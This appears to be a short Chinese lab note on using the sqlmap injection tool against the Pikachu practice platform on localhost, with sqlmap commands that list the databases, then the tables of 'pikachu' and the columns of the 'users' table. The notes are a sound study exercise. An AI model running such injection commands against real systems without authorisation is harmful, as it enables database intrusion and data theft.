sqlmap是一个自动化的sql注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞
1.安装
https://blog.csdn.net/u011781521/article/details/53909151
https://www.jianshu.com/p/3d3656be3c60
2.实验
在pikachu实验平台数字型注入中抓包,记录链接以及提交给服务器的参数
读取数据库
在cmd中进入sqlmap的安装目录,输入命令
D:\sqlmap\sqlmapproject-sqlmap-1.2.12-33-g9564c8e\sqlmapproject-sqlmap-9564c8e>//sqlmap的安装路径
python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=5&submit=%E6%9F%A5%E8%AF%A2" - f --dbms mysql --dbs --batch
//-u 后面接测试链接
// -data 提交给服务器的数据
//--dbms 数据库类型为myslq数据库
//--dbs 列出所有的数据库
//--batch 该参数使用后不需要用户输入,默认提示走下去
成功获取到数据库名
读取表名
D:\sqlmap\sqlmapproject-sqlmap-1.2.12-33-g9564c8e\sqlmapproject-sqlmap-9564c8e>
python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=5&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu --tables --batch
//-D指定数据库
//--tables获取数据库中的表
成功获取表
读取列
D:\sqlmap\sqlmapproject-sqlmap-1.2.12-33-g9564c8e\sqlmapproject-sqlmap-9564c8e>
python sqlmap.py -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=5&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -D pikachu -T users --columns --batch
//-D pikachu 指定数据库
//-T users 指定表名
//--columns 显式列
成功获取列